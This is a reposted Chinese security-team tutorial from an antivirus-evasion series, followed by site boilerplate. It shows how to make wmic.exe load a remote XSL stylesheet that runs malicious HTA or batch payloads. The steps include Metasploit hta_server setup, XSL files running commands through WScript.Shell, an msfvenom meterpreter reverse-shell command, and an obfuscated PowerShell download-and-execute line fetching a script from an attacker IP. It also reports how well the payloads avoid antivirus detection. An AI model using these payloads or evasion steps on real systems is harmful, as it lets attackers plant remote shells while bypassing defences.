内容简介:声明:
声明: Tide安全团队原创文章,转载请声明出处! 文中所涉及的技术、思路和 工具 仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章打包下载及相关软件下载: https://github.com/TideSec/BypassAntiVirus
一、WMIC介绍
WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。
二、WMIC使用
Windows 2003 默认位置:
C:\WINDOWS\system32\wbem\wmic.exe C:\WINDOWS\SysWOW64\wbem\wmic.exe
Windows 7 默认位置:
C:\Windows\System32\wbem\WMIC.exe C:\Windows\SysWOW64\wbem\WMIC.exe
远程执行脚本方式
wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"
三、使用WMIC远程加载payload
wmic可以远程执行任何文件或脚本,因此我们将在XSL代码中链接一个hta文件。XSL文件将包含一个链接,用于通过mshta.exe下载并执行恶意hta文件,该文件由wmic触发。
3.1 利用metasploit
在metasploit的帮助下生成一个hta文件
use exploit/windows/misc/hta_server
set SRVPORT 8088
set srvhost 10.211.55.10
并放置在hta文件的链接 payload.xsl
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("http://10.211.55.10:8088/0lEkSQQmpPP.hta");
]]> </ms:script>
</stylesheet>
目标机器上wmic运行
wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"
执行后hta木马遭到火绒查杀,360提示powershell命令攻击。
点击允许后可上线。
查看hta文件使用了powershell加载木马
将该hta放在virustotal.com上面检测,查杀率28/56
3.2 自定义免杀
刚才发现hta文件使用了powershell,遭到拦截。我们重新修改一下。这里payload选择使用powershell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1
使用powershell的IEX加载payload,并进行混淆
powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"
将该命令重命名为a.bat。使用wmic.exe加载脚本
wmic os get /FORMAT:"http://10.211.55.10/demo.xsl"
demo.xsl
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("a.bat");
]]> </ms:script>
</stylesheet>
只有火绒提示"powershell执行可疑文件" 点击允许后可上线
a.bat在virustotal.com 上面查杀率为3/57
四、参考资料
使用wmic.exe绕过应用程序白名单(多种方法): https://www.cnblogs.com/backlion/p/10489916.html
guān
zhù
wǒ
men
Tide安全团队正式成立于2019年1月 , 是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
对安全感兴趣的小伙伴可以 关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 利用Winrm.vbs绕过白名单限制执行任意代码
- 使用 winrm.vbs 绕过应用白名单执行任意未签名代码
- 远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload
- 远控免杀专题(60)-白名单Forfiles.exe执行payload
- 使用Winrm.vbs绕过应用白名单执行任意未签名代码的分析
- 远控免杀专题(46)-白名单IEexec.exe执行payload(VT免杀率25-69)
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Algorithms + Data Structures = Programs
Niklaus Wirth / Prentice Hall / 1975-11-11 / GBP 84.95
It might seem completely dated with all its examples written in the now outmoded Pascal programming language (well, unless you are one of those Delphi zealot trying to resist to the Java/.NET dominanc......一起来看看 《Algorithms + Data Structures = Programs》 这本书的介绍吧!
